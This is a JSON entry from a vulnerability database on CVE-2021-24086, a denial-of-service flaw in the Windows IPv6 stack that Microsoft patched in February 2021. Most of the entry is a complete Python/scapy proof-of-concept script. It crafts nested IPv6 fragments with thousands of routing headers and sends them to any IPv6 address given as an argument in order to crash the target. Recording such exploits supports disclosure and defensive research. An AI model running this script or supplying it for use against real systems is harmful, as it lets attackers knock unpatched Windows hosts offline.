{"uuid": "e58954bd-8b24-451b-9853-c16202937347", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "title": "Analysis of a Windows IPv6 Fragmentation Vulnerability: CVE-2021-24086", "description": "[Analysis of a denial of service vulnerability affecting the IPv6 stack of Windows](https://blog.quarkslab.com/analysis-of-a-windows-ipv6-fragmentation-vulnerability-cve-2021-24086.html).\n\nThis issue, whose root cause can be found in the mishandling of IPv6 fragments, was patched by Microsoft in their February 2021 security bulletin.\n\n### Proof of Concept\n\n```python\nimport sys\nimport random\n\nfrom scapy.all import *\n\nFRAGMENT_SIZE = 0x400\nLAYER4_FRAG_OFFSET = 0x8\n\nNEXT_HEADER_IPV6_ROUTE = 43\nNEXT_HEADER_IPV6_FRAG = 44\nNEXT_HEADER_IPV6_ICMP = 58\n\n\ndef get_layer4():\n    er = ICMPv6EchoRequest(data = \"PoC for CVE-2021-24086\")\n    er.cksum = 0xa472\n\n    return raw(er)\n\n\ndef get_inner_packet(target_addr):\n    inner_frag_id = random.randint(0, 0xffffffff)\n    print(\"**** inner_frag_id: 0x{:x}\".format(inner_frag_id))\n    raw_er = get_layer4()\n\n    # 0x1ffa Routing headers == 0xffd0 bytes\n    routes = raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_ROUTE)) * (0xffd0//8 - 1)\n    routes += raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_FRAG))\n\n    # First inner fragment header: offset=0, more=1\n    FH = IPv6ExtHdrFragment(offset = 0, m=1, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)\n\n    return routes + raw(FH) + raw_er[:LAYER4_FRAG_OFFSET], inner_frag_id\n\n\ndef send_last_inner_fragment(target_addr, inner_frag_id):\n\n    raw_er = get_layer4()\n\n    ip = IPv6(dst = target_addr)\n    # Second (and last) inner fragment header: offset=1, more=0\n    FH = IPv6ExtHdrFragment(offset = LAYER4_FRAG_OFFSET // 8, m=0, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)\n    send(ip/FH/raw_er[LAYER4_FRAG_OFFSET:])\n\n\ndef trigger(target_addr):\n\n    inner_packet, inner_frag_id = get_inner_packet(target_addr)\n\n    ip = IPv6(dst = target_addr)\n    hopbyhop = IPv6ExtHdrHopByHop(nh = NEXT_HEADER_IPV6_FRAG)\n\n    outer_frag_id = random.randint(0, 0xffffffff)\n\n    fragmentable_part = []\n    for i in range(len(inner_packet) // FRAGMENT_SIZE):\n        fragmentable_part.append(inner_packet[i * FRAGMENT_SIZE: (i+1) * FRAGMENT_SIZE])\n\n    if len(inner_packet) % FRAGMENT_SIZE:\n        fragmentable_part.append(inner_packet[(len(fragmentable_part)) * FRAGMENT_SIZE:])\n\n\n    print(\"Preparing frags...\")\n    frag_offset = 0\n    frags_to_send = []\n    is_first = True\n    for i in range(len(fragmentable_part)):\n        if i == len(fragmentable_part) - 1:\n            more = 0\n        else:\n            more = 1\n\n        FH = IPv6ExtHdrFragment(offset = frag_offset // 8, m=more, id=outer_frag_id, nh = NEXT_HEADER_IPV6_ROUTE)\n\n        blob = raw(FH/fragmentable_part[i])\n        frag_offset += FRAGMENT_SIZE\n\n        frags_to_send.append(ip/hopbyhop/blob)\n\n\n    print(\"Sending {} frags...\".format(len(frags_to_send)))\n    for frag in frags_to_send:\n        send(frag)\n\n\n    print(\"Now sending the last inner fragment to trigger the bug...\")\n    send_last_inner_fragment(target_addr, inner_frag_id)\n\n\nif __name__ == '__main__':\n    if len(sys.argv) < 2:\n        print('Usage: cve-2021-24086.py <IPv6 addr>')\n        sys.exit(1)\n    trigger(sys.argv[1])\n```", "description_format": "markdown", "vulnerability": "CVE-2021-24086", "creation_timestamp": "2024-08-28T09:53:22.190586+00:00", "timestamp": "2024-08-30T12:27:27.331911+00:00", "related_vulnerabilities": [], "meta": [{"tags": ["vulnerability:exploitability=documented", "vulnerability:information=PoC"]}], "author": {"login": "sync_user", "name": "sync_user", "uuid": "4f29edb9-4c4b-44ca-b041-9b050656b6ae"}}
